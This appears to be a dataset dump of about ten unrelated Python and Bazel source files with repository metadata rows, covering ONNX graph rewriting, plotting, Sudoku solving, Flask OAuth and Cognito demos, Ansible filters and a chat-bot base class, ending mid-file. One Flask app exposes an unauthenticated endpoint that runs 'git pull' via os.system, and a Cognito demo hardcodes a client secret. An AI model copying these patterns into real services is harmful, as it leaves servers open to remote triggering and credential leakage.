if n_gemm is None:
continue
# Must be an (n-1)-d flatten before gemm
assert list(target_shape.input_data) == [1, -1]
# Connect input of reshape to gemm, then remove reshape
graph.add_edge(reshape_input, n_gemm, index=0)
graph.remove_node(node)
return graph
def get_next_in_chain(
graph: nx.DiGraph, type_: str, node: Optional[NodeT]
) -> Optional[NodeT]:
"""
Get a unique user node of the unique output of Node `node`,
and return it if it has Type `type_`.
"""
if node is None or len(node.output) != 1:
return None # Propagates None; Unique output
users = list(graph.neighbors(node))
if len(users) != 1 or users[0].op_type != type_:
return None # Unique user of the output; Correct type
return users[0]
def build_graph_with_mapping(
graph: nx.DiGraph, node_mapping: Dict[NodeT, EmitNodeT]
) -> nx.DiGraph:
graph = graph.copy()
single_node, multi_node = {}, {}
for replace_node, by_node in node_mapping.items():
if isinstance(by_node, g.DFGNode):
single_node[replace_node] = by_node
else:
multi_node[replace_node] = by_node
# We do one-to-many replacements first
# because their predecessors are specified as onnx nodes.
for replace_node, subgraph in multi_node.items():
# Add subgraph itself
graph = nx.compose(graph, subgraph.subgraph)
# Add in edges
graph.add_edges_from(subgraph.entry_edges)
# Add out edges
succ = graph.out_edges(replace_node, "index")
for _, to, index in succ:
graph.add_edge(subgraph.exit, to, index=index)
# Remove old node
graph.remove_node(replace_node)
# Then do all one-to-one replacements.
graph = nx.relabel_nodes(graph, single_node)
return graph
def extract_tensors_from_graph(onnx_graph: GraphT) -> Dict[str, g.TensorNode]:
tensors = {}
# parse weight
weight_cnt = 0
for weight_tensor in onnx_graph.initializer:
tensors[weight_tensor.name] = g.WeightTensor(
weight_tensor, f"weight_{weight_cnt}"
)
weight_cnt += 1
# parse input
input_cnt = 0
for input_ in onnx_graph.input:
if input_.name in tensors:
continue
tensors[input_.name] = g.InputTensor(
input_, get_node_shape(input_), f"input_{input_cnt}"
)
input_cnt += 1
return tensors
def sorted_inputs(graph: nx.DiGraph, node):
sorted_edges = sorted(graph.in_edges(node, "index"), key=lambda p: p[2])
return [e[0] for e in sorted_edges]
def draw_graph(graph: nx.DiGraph, output_to):
from networkx.drawing.nx_agraph import to_agraph
agraph = to_agraph(graph)
agraph.layout("dot")
agraph.draw(output_to)
| 39.519062
| 96
| 0.632755
| 9,257
| 0.686925
| 0
| 0
| 5,139
| 0.381345
| 0
| 0
| 3,559
| 0.264099
|
773a004602d8821b5d2db1868127d6d37b7dd480
| 4,435
|
py
|
Python
|
analysis/plotting/multi_sites.py
|
jm9e/FL_Pipeline
|
d9a8c3d3511817418d908b7a94ccd049c60b7b5d
|
[
"Apache-2.0"
] | null | null | null |
analysis/plotting/multi_sites.py
|
jm9e/FL_Pipeline
|
d9a8c3d3511817418d908b7a94ccd049c60b7b5d
|
[
"Apache-2.0"
] | null | null | null |
analysis/plotting/multi_sites.py
|
jm9e/FL_Pipeline
|
d9a8c3d3511817418d908b7a94ccd049c60b7b5d
|
[
"Apache-2.0"
] | null | null | null |
import csv
import json
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
formats = ['png', 'pdf', 'svg', 'eps']
metrics = [
{'gmetric': 'groc', 'lmetric': 'lroc', 'metric': 'AUC'},
{'gmetric': 'gauc', 'lmetric': 'lauc', 'metric': 'PRAUC'},
]
datasets = [
{'name': 'HCC', 'file': '../../results/evaluation/hcc_multi_sites_100_each.csv'},
{'name': 'ILPD', 'file': '../../results/evaluation/ilpd_multi_sites_100_each.csv'},
{'name': 'LTD', 'file': '../../results/evaluation/tumor_multi_sites_100_each.csv'},
{'name': 'BCD', 'file': '../../results/evaluation/diag_multi_sites_100_each.csv'},
]
for metric in metrics:
gmetric = metric['gmetric']
lmetric = metric['lmetric']
metric = metric['metric']
for ds in datasets:
file = ds['file']
name = ds['name']
title = f'{name} | Multiple Local Models'
stats = {}
xs = ['1', '2', '5', '10', '20', '50', '100']
with open(file, newline='') as csvfile:
data = csv.reader(csvfile, delimiter=';')
headers = next(data)
gauc_idx = headers.index(gmetric)
lauc_idx = headers.index(lmetric)
for row in data:
stat = stats.get(row[1])
if not stat:
stat = {
gmetric: [],
lmetric: [],
}
stats[row[1]] = stat
# xs.append(row[1])
gvals = json.loads(row[gauc_idx])
lvals = json.loads(row[lauc_idx])
stat[gmetric].append(gvals)
if len(lvals) > 0:
stat[lmetric].extend(lvals)
else:
stat[lmetric].append(gvals)
# datainfo = str(len(stats['100'][gmetric]))
# title += ' | ' + datainfo
y_gauc_median = [np.median(stats[x][gmetric]) for x in xs]
y_gauc_q25 = [np.quantile(stats[x][gmetric], 0.25) for x in xs]
y_gauc_q75 = [np.quantile(stats[x][gmetric], 0.75) for x in xs]
y_lauc_median = [np.median(stats[x][lmetric]) for x in xs]
y_lauc_q25 = [np.quantile(stats[x][lmetric], 0.25) for x in xs]
y_lauc_q75 = [np.quantile(stats[x][lmetric], 0.75) for x in xs]
xs = [int(x) for x in xs]
regular_col = '#b0b0b0'
global_col = '#424ef5'
local_col = '#f57542'
alpha_mean = 1.0
alpha_q = 0.25
alpha_area = 0.2
fig = plt.figure(figsize=(6, 4.5))
ax = fig.add_subplot()
ax.hlines(y_gauc_q25[0], 1, 100, linestyles='dotted', colors=[regular_col])
ax.hlines(y_gauc_median[0], 1, 100, label='Centralized', colors=[regular_col])
ax.hlines(y_gauc_q75[0], 1, 100, linestyles='dotted', colors=[regular_col])
ax.fill_between(xs, y_gauc_q25, y_gauc_median, color=global_col, alpha=alpha_area)
ax.fill_between(xs, y_gauc_q75, y_gauc_median, color=global_col, alpha=alpha_area)
ax.fill_between(xs, y_lauc_q25, y_lauc_median, color=local_col, alpha=alpha_area)
ax.fill_between(xs, y_lauc_q75, y_lauc_median, color=local_col, alpha=alpha_area)
ax.plot(xs, y_gauc_q25, '_', color=global_col, alpha=alpha_q)
ax.plot(xs, y_gauc_median, '.', label='Combined', color=global_col, alpha=alpha_mean)
ax.plot(xs, y_gauc_q75, '_', color=global_col, alpha=alpha_q)
ax.plot(xs, y_lauc_q25, '_', color=local_col, alpha=alpha_q)
ax.plot(xs, y_lauc_median, '.', label='Local', color=local_col, alpha=alpha_mean)
ax.plot(xs, y_lauc_q75, '_', color=local_col, alpha=alpha_q)
plt.yticks([0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
plt.xscale('log')
plt.xticks([1, 2, 5, 10, 20, 50, 100], ['Centralized', '2', '5', '10', '20', '50', '100'])
plt.ylabel(metric)
plt.xlabel('Number of Sites')
plt.legend()
plt.title(title)
for format in formats:
plt.savefig(f'../../results/plots/{name}_{metric}_sites.{format}', format=format, bbox_inches='tight')
| 38.903509
| 118
| 0.521308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 812
| 0.183089
|
773a2176b2ba4a1a9a4e1bd585d65e2d15549d01
| 226
|
py
|
Python
|
HackerRank/CtCI/array_left_rotation.py
|
mahasak/Practice
|
7ed125087b977b034161157830b8e415d52b6ed7
|
[
"Unlicense"
] | null | null | null |
HackerRank/CtCI/array_left_rotation.py
|
mahasak/Practice
|
7ed125087b977b034161157830b8e415d52b6ed7
|
[
"Unlicense"
] | null | null | null |
HackerRank/CtCI/array_left_rotation.py
|
mahasak/Practice
|
7ed125087b977b034161157830b8e415d52b6ed7
|
[
"Unlicense"
] | null | null | null |
def array_left_rotation(a, n, k):
return a[k:] + a[0:k]
n, k = map(int, raw_input().strip().split(' '))
a = map(int, raw_input().strip().split(' '))
answer = array_left_rotation(a, n, k);
print ' '.join(map(str,answer))
| 25.111111
| 47
| 0.610619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.039823
|
773a351110e170920b1633be885fbe44c1c4b850
| 4,127
|
py
|
Python
|
examples/sudoku/sudoku_cores.py
|
SRI-CSL/yices2_python_bindings
|
ff48993b6f620605afce12741f9afede94238627
|
[
"MIT"
] | 8
|
2018-09-19T00:42:45.000Z
|
2022-03-25T12:22:01.000Z
|
examples/sudoku/sudoku_cores.py
|
SRI-CSL/yices2_python_bindings
|
ff48993b6f620605afce12741f9afede94238627
|
[
"MIT"
] | 4
|
2020-06-05T21:44:14.000Z
|
2021-12-06T17:24:31.000Z
|
examples/sudoku/sudoku_cores.py
|
SRI-CSL/yices2_python_bindings
|
ff48993b6f620605afce12741f9afede94238627
|
[
"MIT"
] | 3
|
2020-07-10T18:15:01.000Z
|
2020-12-16T09:50:02.000Z
|
#!/usr/bin/env python
"""Using unsat cores to give hints."""
from SudokuLib import Puzzle
from Solver import Solver
from yices.Yices import Yices
from yices.Census import Census
puzzle_blank = [
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
#
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
#
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
puzzle_1 = [
[ 0, 6, 0, 0, 0, 8, 0, 7, 3],
[ 0, 0, 2, 0, 0, 0, 0, 4, 0],
[ 5, 0, 0, 0, 6, 0, 0, 0, 0],
#
[ 0, 0, 0, 6, 0, 2, 0, 0, 5],
[ 0, 0, 4, 0, 0, 0, 1, 0, 0],
[ 6, 0, 0, 8, 0, 7, 0, 0, 0],
#
[ 0, 0, 0, 0, 7, 0, 0, 0, 1],
[ 0, 5, 0, 0, 0, 0, 3, 0, 0],
[ 4, 3, 0, 1, 0, 0, 0, 8, 0],
]
# puzzle_2 come from here:
# https://puzzling.stackexchange.com/questions/29/what-are-the-criteria-for-determining-the-difficulty-of-sudoku-puzzle
# where it is claimed to be the "hardest sudoku in the world"
# but in fact is not a valid sudoku since it has more than one solution. tut tut.
# I added it to one of the predefined boards ('escargot') of SudokuSensei and
# it has 29 non isomorphic models (aka solutions).
puzzle_ai_escargot = [
[ 1, 0, 0, 0, 0, 7, 0, 9, 0],
[ 0, 3, 0, 0, 2, 0, 0, 0, 8],
[ 0, 0, 9, 6, 0, 0, 5, 0, 0],
#
[ 0, 0, 5, 3, 0, 0, 9, 0, 0],
[ 0, 1, 0, 0, 8, 0, 0, 0, 2],
[ 6, 0, 0, 0, 0, 4, 0, 0, 0],
#
[ 3, 0, 0, 0, 0, 0, 0, 1, 0],
[ 0, 4, 0, 0, 0, 0, 0, 0, 7],
[ 0, 0, 7, 0, 0, 0, 0, 3, 0],
]
extreme_1 = [
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 2, 0, 0, 7, 1, 5, 0],
[ 4, 0, 0, 0, 0, 9, 3, 0, 6],
#
[ 0, 1, 0, 0, 0, 3, 0, 0, 5],
[ 0, 0, 0, 5, 2, 4, 0, 0, 0],
[ 3, 0, 0, 7, 0, 0, 0, 6, 0],
#
[ 1, 0, 7, 6, 0, 0, 0, 0, 9],
[ 0, 5, 6, 8, 0, 0, 4, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
extreme_2 = [
[ 0, 0, 0, 0, 0, 0, 7, 0, 3],
[ 0, 0, 6, 0, 0, 8, 5, 4, 0],
[ 5, 0, 0, 0, 7, 0, 0, 0, 0],
#
[ 0, 1, 9, 0, 0, 4, 8, 0, 0],
[ 7, 0, 0, 0, 0, 0, 0, 0, 9],
[ 0, 0, 8, 9, 0, 0, 2, 1, 0],
#
[ 0, 0, 0, 0, 5, 0, 0, 0, 2],
[ 0, 5, 7, 3, 0, 0, 1, 0, 0],
[ 4, 0, 3, 0, 0, 0, 0, 0, 0],
]
extreme_3 = [
[ 8, 0, 1, 0, 9, 0, 0, 0, 0],
[ 0, 7, 2, 0, 0, 1, 0, 0, 0],
[ 0, 0, 0, 3, 0, 0, 8, 0, 0],
#
[ 5, 0, 0, 1, 0, 0, 0, 4, 0],
[ 1, 0, 0, 0, 3, 0, 0, 0, 9],
[ 0, 2, 0, 0, 0, 7, 0, 0, 5],
#
[ 0, 0, 5, 0, 0, 2, 0, 0, 0],
[ 0, 0, 0, 4, 0, 0, 5, 9, 0],
[ 0, 0, 0, 0, 8, 0, 4, 0, 3],
]
extreme_4 = [
[ 7, 0, 0, 0, 0, 4, 0, 5, 0],
[ 0, 0, 0, 5, 0, 0, 1, 0, 0],
[ 0, 0, 0, 0, 0, 6, 0, 7, 8],
#
[ 0, 0, 4, 0, 0, 0, 8, 0, 0],
[ 3, 5, 0, 0, 8, 0, 0, 1, 9],
[ 0, 0, 8, 0, 0, 0, 2, 0, 0],
#
[ 5, 4, 0, 1, 0, 0, 0, 0, 0],
[ 0, 0, 6, 0, 0, 5, 0, 0, 0],
[ 0, 8, 0, 9, 0, 0, 0, 0, 1],
]
#https://www.conceptispuzzles.com/index.aspx?uri=info/article/424
hardest = [
[ 8, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 3, 6, 0, 0, 0, 0, 0],
[ 0, 7, 0, 0, 9, 0, 2, 0, 0],
#
[ 0, 5, 0, 0, 0, 7, 0, 0, 0],
[ 0, 0, 0, 0, 4, 5, 7, 0, 0],
[ 0, 0, 0, 1, 0, 0, 0, 3, 0],
#
[ 0, 0, 1, 0, 0, 0, 0, 6, 8],
[ 0, 0, 8, 5, 0, 0, 0, 1, 0],
[ 0, 9, 0, 0, 0, 0, 4, 0, 0],
]
def analyze(rawpuzzle, name):
puzzle = Puzzle(rawpuzzle)
print(f'\nPuzzle ({name}):\n')
puzzle.pprint()
solver = Solver(puzzle)
solution = solver.solve()
if solution is not None:
print(f'\nSolution ({name}):\n')
solution.pprint()
#<experimental zone>
simplest = solver.filter_cores(solution)
if simplest is not None:
solver.show_hints(simplest)
#</experimental zone>
def main():
analyze(puzzle_1, "evil")
analyze(extreme_1, "extreme #1")
analyze(extreme_2, "extreme #2")
analyze(extreme_3, "extreme #3")
analyze(extreme_4, "extreme #4")
analyze(hardest, "hardest")
if __name__ == '__main__':
main()
print(Census.dump())
Yices.exit(True)
| 24.565476
| 119
| 0.414587
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 716
| 0.173492
|
773b69ca25c1ef12c8384954c0ed9f9b031bb82b
| 2,715
|
py
|
Python
|
www/python/src/app.py
|
Destokado/funpedia
|
d864ac15c5ed9983d9a1373fad364d2f0ffc66fc
|
[
"MIT"
] | null | null | null |
www/python/src/app.py
|
Destokado/funpedia
|
d864ac15c5ed9983d9a1373fad364d2f0ffc66fc
|
[
"MIT"
] | null | null | null |
www/python/src/app.py
|
Destokado/funpedia
|
d864ac15c5ed9983d9a1373fad364d2f0ffc66fc
|
[
"MIT"
] | null | null | null |
import os
import flask
import mwoauth
import yaml
from flask import request, Response
app = flask.Flask(__name__)
# Load configuration from YAML file
__dir__ = os.path.dirname(__file__)
app.config.update(
yaml.safe_load(open(os.path.join(__dir__, 'config.yaml'))))
if __name__ == '__main__':
app.run_server(host='0.0.0.0', threaded=True, debug=True)
####APP.ROUTE####
@app.route('/login/')
def login():
"""Initiate an OAuth login.
Call the MediaWiki server to get request secrets and then redirect the
user to the MediaWiki server to sign the request.
"""
consumer_token = mwoauth.ConsumerToken(
app.config['CONSUMER_KEY'], app.config['CONSUMER_SECRET'])
try:
redirect, request_token = mwoauth.initiate(
app.config['OAUTH_MWURI'], consumer_token)
except Exception:
app.logger.exception('mwoauth.initiate failed')
return flask.redirect(flask.url_for('index'))
else:
flask.session['request_token'] = dict(zip(
request_token._fields, request_token))
return flask.redirect(redirect)
@app.route('/oauth-callback/')
def oauth_callback():
"""OAuth handshake callback."""
if 'request_token' not in flask.session:
flask.flash(u'OAuth callback failed. Are cookies disabled?')
return flask.redirect(flask.url_for('index'))
consumer_token = mwoauth.ConsumerToken(
app.config['CONSUMER_KEY'], app.config['CONSUMER_SECRET'])
try:
access_token = mwoauth.complete(
app.config['OAUTH_MWURI'],
consumer_token,
mwoauth.RequestToken(**flask.session['request_token']),
flask.request.query_string)
identity = mwoauth.identify(
app.config['OAUTH_MWURI'], consumer_token, access_token)
except Exception:
app.logger.exception('OAuth authentication failed')
else:
flask.session['access_token'] = dict(zip(
access_token._fields, access_token))
flask.session['username'] = identity['username']
return flask.redirect(flask.url_for('index'))
@app.route('/logout/')
def logout():
"""Log the user out by clearing their session."""
flask.session.clear()
return flask.redirect(flask.url_for('index'))
@app.route('/git-pull/', methods=['POST'])
def respond():
print(request.json);
os.system('git pull')
return Response(status=200)
@app.errorhandler(404)
def handling_page_not_found(e):
return "<h1>404</h1><p>The resource could not be found.</p>", 404
# APPS
from view.home import *
from view.editing_buddy_app import *
from view.storytelling_app import *
from view.duel_app import *
# Others
from view.layouts import *
| 27.989691
| 74
| 0.673665
| 0
| 0
| 0
| 0
| 2,150
| 0.791897
| 0
| 0
| 774
| 0.285083
|
773e5f3762c89c880f8d622fb33299a5f198d29d
| 130
|
bzl
|
Python
|
test/external_repo/repo.bzl
|
Vertexwahn/depend_on_what_you_use
|
480732677a74fb7033848004d4d5015af0ad36c5
|
[
"MIT"
] | null | null | null |
test/external_repo/repo.bzl
|
Vertexwahn/depend_on_what_you_use
|
480732677a74fb7033848004d4d5015af0ad36c5
|
[
"MIT"
] | null | null | null |
test/external_repo/repo.bzl
|
Vertexwahn/depend_on_what_you_use
|
480732677a74fb7033848004d4d5015af0ad36c5
|
[
"MIT"
] | null | null | null |
def load_external_repo():
native.local_repository(
name = "ext_repo",
path = "test/external_repo/repo",
)
| 21.666667
| 41
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 35
| 0.269231
|
77401bdbe34d3710ff102d672087cc5c7146f27e
| 1,817
|
py
|
Python
|
filter_plugins/general.py
|
stackhpc/ansible-role-luks
|
8c4b5f472ab0aef3d2a776d4fcd37ca17c6eac05
|
[
"Apache-1.1"
] | 3
|
2020-04-14T19:57:25.000Z
|
2021-01-11T09:09:16.000Z
|
filter_plugins/general.py
|
stackhpc/ansible-role-luks
|
8c4b5f472ab0aef3d2a776d4fcd37ca17c6eac05
|
[
"Apache-1.1"
] | 4
|
2020-08-12T10:24:25.000Z
|
2022-01-17T17:48:28.000Z
|
filter_plugins/general.py
|
stackhpc/ansible-role-luks
|
8c4b5f472ab0aef3d2a776d4fcd37ca17c6eac05
|
[
"Apache-1.1"
] | 2
|
2021-06-17T21:57:42.000Z
|
2022-02-20T08:02:43.000Z
|
# Copyright (c) 2020 StackHPC Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from ansible import errors
import jinja2
def _get_hostvar(context, var_name, inventory_hostname=None):
if inventory_hostname is None:
namespace = context
else:
if inventory_hostname not in context['hostvars']:
raise errors.AnsibleFilterError(
"Inventory hostname '%s' not in hostvars" % inventory_hostname)
namespace = context["hostvars"][inventory_hostname]
return namespace.get(var_name)
@jinja2.contextfilter
def luks_mode(context, device):
"""Returns a string represent the mode"""
if "mode" in device:
return device["mode"]
return "keyfile"
@jinja2.contextfilter
def luks_key(context, device):
"""Returns name of keyfile"""
return device["device"].replace('/', '-')[1:]
@jinja2.contextfilter
def luks_keypath(context, device):
"""Returns full path to keyfile"""
directory = _get_hostvar(context, "luks_keys_path")
key = luks_key(context, device)
return os.path.join(directory, key)
class FilterModule(object):
"""Utility filters."""
def filters(self):
return {
'luks_mode': luks_mode,
'luks_key': luks_key,
'luks_keypath': luks_keypath,
}
| 28.84127
| 79
| 0.690149
| 217
| 0.119428
| 0
| 0
| 538
| 0.296092
| 0
| 0
| 842
| 0.463401
|
77415032b1eca6d95f7e905db147fe61fa6860f9
| 3,864
|
py
|
Python
|
aws-dev/awsdev8/flaskstart.py
|
PacktPublishing/-AWS-Certified-Developer---Associate-Certification
|
3f76e3d3df6797705b5b30ae574fe678250d5e92
|
[
"MIT"
] | 13
|
2020-02-02T13:53:50.000Z
|
2022-03-20T19:50:02.000Z
|
aws-dev/awsdev8/flaskstart.py
|
PacktPublishing/-AWS-Certified-Developer---Associate-Certification
|
3f76e3d3df6797705b5b30ae574fe678250d5e92
|
[
"MIT"
] | 2
|
2020-03-29T19:08:04.000Z
|
2021-06-02T00:57:44.000Z
|
aws-dev/awsdev8/flaskstart.py
|
PacktPublishing/-AWS-Certified-Developer---Associate-Certification
|
3f76e3d3df6797705b5b30ae574fe678250d5e92
|
[
"MIT"
] | 10
|
2019-12-25T20:42:37.000Z
|
2021-11-17T15:19:00.000Z
|
#!/usr/bin/env python
from flask import Flask, request,Response
import logging
import os
import json
import cognitoHelper as cog
#logging config
logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s',level=logging.INFO,datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(__name__)
#globals
MODULE = "section8"
HOST = "0.0.0.0"
PORT = "8080"
PROFILE = "aws-dev"
REGION = "eu-west-2"
PROFILE = "aws-dev"
REGION = "eu-west-2"
COGNITO_CLIENT_ID = "5br85tkg2nmq8nn1v8pk71lkku"
COGNITO_CLIENT_SECRET = "nvob2gmc5qcgak315fncnuau5a25vumhicc8s1m62gkn4q2m4gs"
USER_POOL = "my-app-pool"
#initiliase flask
app = Flask(__name__)
app.secret_key = os.urandom(24)
cidp = cog.create_client(REGION)
@app.route('/api/<string:version>/auth/login',methods=["POST"])
def loginUser(version):
result = {}
headers = {}
username = request.authorization.username
password = request.authorization.password
authObject = cog.login(cidp,username,password,USER_POOL)
if 'error' in authObject:
if 'User is disabled' in str(authObject['error']):
result['error'] = "user disabled"
else:
result['error'] = str(authObject['error'])
status = 401
result['result'] = 'fail'
else:
result['result'] = "ok"
result['data'] = authObject['AuthenticationResult']
status = 200
lresponse = Response(json.dumps(result), status=status, mimetype='application/json',headers=headers)
if status == 200:
lresponse.set_cookie("idtoken",authObject['AuthenticationResult']['IdToken'],httponly=True,expires=None)
return lresponse
@app.route('/api/<string:version>/content/warranty',methods=["POST"])
def secure(version):
resource_path = request.path
result = {}
headers = {}
idtoken = request.cookies.get("idtoken")
if request.args.get('accesstoken'):
access_token = request.args.get('accesstoken')
try:
tokenObject = cog.decode_cognito_token(access_token)
except Exception as e:
status = 500
result['error'] = str(e)
else:
if 'error' in tokenObject:
result['error'] = tokenObject['error']
status = 403
result['result'] = 'fail'
else:
found = 0
if str(tokenObject['data']['scope']).find(resource_path) == 0:
found = 1
if found == 1:
result['result'] = "ok"
result['data'] = tokenObject['data']
status = 200
else:
status = 403
result['resource'] = resource_path
result['result'] = 'fail'
result['error'] = "Not in scope, scope=" + tokenObject['data']['scope']
else:
result['error'] = "no accesstoken specified"
status = 400
result['result'] = 'fail'
lresponse = Response(json.dumps(result), status=status, mimetype='application/json', headers=headers)
return lresponse
@app.route('/api/<string:version>/auth/whoami',methods=["POST"])
def whoami(version):
result = {}
headers = {}
idtoken = request.cookies.get("idtoken")
tokenObject = cog.decode_cognito_token(idtoken)
if 'error' in tokenObject:
result['error'] = tokenObject['error']
status = 401
result['result'] = 'fail'
else:
result['result'] = "ok"
result['data'] = tokenObject
status = 200
lresponse = Response(json.dumps(result), status=status, mimetype='application/json',headers=headers)
return lresponse
def main ():
print('Running:{}'.format(MODULE))
app.run(debug=True)
#app.run(host='0.0.0.0',port=PORT)
app.logger.info('Running:{}'.format(MODULE))
if __name__ == "__main__":
main()
| 32.2
| 116
| 0.607143
| 0
| 0
| 0
| 0
| 2,947
| 0.762681
| 0
| 0
| 980
| 0.253623
|
77438c9d6cdc3cb8fd8940ebf432371649706560
| 4,204
|
py
|
Python
|
hallo/function.py
|
joshcoales/Hallo
|
17145d8f76552ecd4cbc5caef8924bd2cf0cbf24
|
[
"MIT"
] | 1
|
2018-05-19T22:27:20.000Z
|
2018-05-19T22:27:20.000Z
|
hallo/function.py
|
joshcoales/Hallo
|
17145d8f76552ecd4cbc5caef8924bd2cf0cbf24
|
[
"MIT"
] | 75
|
2015-09-26T18:07:18.000Z
|
2022-01-04T07:15:11.000Z
|
hallo/function.py
|
SpangleLabs/Hallo
|
17145d8f76552ecd4cbc5caef8924bd2cf0cbf24
|
[
"MIT"
] | 1
|
2021-04-10T12:02:47.000Z
|
2021-04-10T12:02:47.000Z
|
from abc import ABC, abstractmethod
from typing import Set, Type, Optional
from hallo.events import (
EventSecond,
EventMinute,
EventHour,
EventDay,
EventPing,
EventMessage,
EventJoin,
EventLeave,
EventQuit,
EventNameChange,
EventKick,
EventInvite,
EventNotice,
EventMode,
EventCTCP, Event, ServerEvent,
)
class Function(ABC):
"""
Generic function object. All functions inherit from this.
"""
# Static constants
EVENT_SECOND = EventSecond # Event which happens every second
EVENT_MINUTE = EventMinute # Event which happens every minute
EVENT_HOUR = EventHour # Event which happens every hour
EVENT_DAY = EventDay # Event which happens every day
EVENT_PING = EventPing # Event constant signifying a server ping has been received
EVENT_MESSAGE = EventMessage # Event constant signifying a standard message
EVENT_JOIN = EventJoin # Event constant signifying someone joined a channel
EVENT_LEAVE = EventLeave # Event constant signifying someone left a channel
EVENT_QUIT = EventQuit # Event constant signifying someone disconnected
EVENT_CHNAME = (
EventNameChange # Event constant signifying someone changed their name
)
EVENT_KICK = EventKick # Event constant signifying someone was forcibly removed from the channel
EVENT_INVITE = (
EventInvite # Event constant signifying someone has invited hallo to a channel
)
EVENT_NOTICE = (
EventNotice # Event constant signifying a notice was received. (IRC only?)
)
EVENT_MODE = (
EventMode # Event constant signifying a channel mode change. (IRC only?)
)
EVENT_CTCP = (
EventCTCP # Event constant signifying a CTCP message received (IRC only)
)
# EVENT_NUMERIC = "numeric" # Event constant signifying a numeric message from a server (IRC only)
# EVENT_RAW = "raw" # Event constant signifying raw data received from server which doesn't fit the above
def __init__(self):
self.help_name = None # Name for use in help listing
self.names: Set[str] = set() # Set of names which can be used to address the function
self.help_docs = (
None # Help documentation, if it's just a single line, can be set here
)
@abstractmethod
def run(self, event: EventMessage) -> EventMessage:
"""Runs the function when it is called directly
:param event: Event which function wants running on, for which, this should be true:
(is_prefixed is not false and command_args is not None)
"""
raise NotImplementedError
@staticmethod
def is_persistent() -> bool:
"""Returns boolean representing whether this function is supposed to be persistent or not"""
return False
@staticmethod
def load_function() -> 'Function':
"""Loads the function, persistent functions only."""
return Function()
def save_function(self) -> None:
"""Saves the function, persistent functions only."""
return None
def get_passive_events(self) -> Set[Type[Event]]:
"""Returns a list of events which this function may want to respond to in a passive way"""
return set()
def passive_run(self, event: Event, hallo_obj) -> Optional[ServerEvent]:
"""Replies to an event not directly addressed to the bot.
:param event: Event which has called the function
:param hallo_obj: Hallo object which fired the event.
"""
pass
def get_help_name(self) -> str:
"""Returns the name to be printed for help documentation"""
if self.help_name is None:
raise NotImplementedError
return self.help_name
def get_help_docs(self) -> str:
"""
Returns the help documentation, specific to given arguments, if supplied
"""
if self.help_docs is None:
raise NotImplementedError
return self.help_docs
def get_names(self) -> Set[str]:
"""Returns the list of names for directly addressing the function"""
self.names.add(self.help_name)
return self.names
| 36.556522
| 119
| 0.670076
| 3,834
| 0.911989
| 0
| 0
| 637
| 0.151522
| 0
| 0
| 2,149
| 0.51118
|
774895ccb2d658440364d2b85b233c22dd7dda42
| 4,332
|
py
|
Python
|
mbl-core/tests/devices/open-ports-checker/mbl/open_ports_checker/open_ports_checker.py
|
edmund-troche/mbl-core
|
70fd55691301792169fb1feafc2a5e4ba107ee97
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 5
|
2019-08-25T06:18:25.000Z
|
2020-03-20T14:40:18.000Z
|
mbl-core/tests/devices/open-ports-checker/mbl/open_ports_checker/open_ports_checker.py
|
edmund-troche/mbl-core
|
70fd55691301792169fb1feafc2a5e4ba107ee97
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 39
|
2019-06-03T14:31:20.000Z
|
2020-01-13T09:00:04.000Z
|
mbl-core/tests/devices/open-ports-checker/mbl/open_ports_checker/open_ports_checker.py
|
edmund-troche/mbl-core
|
70fd55691301792169fb1feafc2a5e4ba107ee97
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 2
|
2019-11-29T06:12:35.000Z
|
2020-06-17T13:56:39.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2019 Arm Limited and Contributors. All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
"""This script checks for checker for unwanted TCP/UDP open ports."""
import os
import json
import logging
from enum import Enum
import mbl.open_ports_checker.connection as connection
import mbl.open_ports_checker.netstatutils as nsu
__version__ = "1.0"
class Status(Enum):
"""OpenPortsChecker operation status codes."""
SUCCESS = 0
BLACK_LISTED_CONNECTION = 1
class OpenPortsChecker:
"""Checker for unwanted open ports."""
def __init__(self, white_list_filename):
"""
Create and initialize OpenPortsChecker object.
:param white_list_filename: white list .json file name
"""
self.logger = logging.getLogger("OpenPortsChecker")
self.logger.info("Initializing OpenPortsChecker")
self.logger.info("Version {}".format(__version__))
# Load connections white list JSON file
with open(white_list_filename, "r") as in_file:
self.white_list = json.load(in_file)
def run_check(self):
"""
Run open ports check.
:return: Status.SUCCESS if all open ports are white-listed
otherwise Status.BLACK_LISTED_CONNECTION
"""
active_connections = self.__get_list_of_active_connections()
self.logger.debug(
"Found {} active connections".format(len(active_connections))
)
return self.__check_connections_against_white_list(active_connections)
def __check_connection_against_white_list(self, connection):
"""
Check if a single connection is white listed.
:param connection: connection objects to be checked against
white list
:return: Status.SUCCESS
Status.BLACK_LISTED_CONNECTION
"""
check_result = Status.BLACK_LISTED_CONNECTION
ports = self.white_list["ports"]
for port_data in ports:
